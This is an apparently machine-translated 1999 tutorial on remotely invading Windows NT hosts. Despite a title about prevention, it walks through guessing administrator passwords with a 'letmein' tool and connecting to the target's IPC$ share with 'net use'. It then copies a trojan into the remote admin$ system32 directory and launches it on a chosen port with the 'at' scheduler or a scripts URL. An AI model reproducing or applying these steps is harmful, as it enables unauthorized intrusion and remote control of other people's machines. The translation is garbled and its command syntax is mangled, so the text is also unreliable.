Remote prevent the invasion of Windows NT: Billows 1999/03 / 12 Microsoft's Windows NT platform, the network has been set up in rage, since there are many network systems use it, but it's constantly vulnerabilities in Microsoft's Internet The patch still exists. Whenever we put on the patch of Microsoft, new vulnerabilities appear again. It is also quite simple to use these vulnerabilities for network far-end invasion. Now let's take a look at how to invade the Windows NT host! First, we must attack the distal target. Of course, you can know the other IP address, you can use a variety of scanning tools to find the IP address of the target machine, here because it is not it, there is not much to say. After determining the attack target, use the Windows NT's own command to obtain a remote target user list resource, analyze the obtained list resource, and try to obtain administrator privileges. The letmein command is used to remotely log in to the server via the specified password, and read the user information on the server, with different parameters, you can obtain the corresponding control. For example: / xxxx / -admin -g mypwd (you can view the list of administrators on // xxxx, and try to get the control of the administrator through the password followed by the parameter.) -d mypwd (attempt to obtain user control through the password followed by the parameter, and display all usernames on // xxxx.) When using the letmein command to obtain the relevant administrator privilege, use the standard command provided by Windows to connect Remote resources and copy the Trojan into the remote goal, you can use the Trojan, which is not introduced, the specific command is: Net USE // XXXX / IPC $ "pass" / user: "user" Just guess the username and password login // xxxx host) copy x: /netserver.exe // xxxx / admin $ / system32 (copy local Trojan NetServer.exe to the remote // xxxx administrator directory ) then use the legitimate Windows NT command Trojans remote boot just admitted to: netsvc // xxxx schedule / start at // xxxx hh: mm netserver.exe / port: yourport / nomsg command in the above Use the WINDOWS NT task program management to run Trojans at the specified time and the specified port. Another way: Run Trojans, such as: http: //xxx/scripts/ntsrver.exe/port: YourPort or http: //xxxx/cgi-gin/ntsrver.exe/port: YourPort, etc. At this point, the invasion can be successful, and the remote resource has been under its own control. Manage passwords that use crack tools to spend only a few minutes.
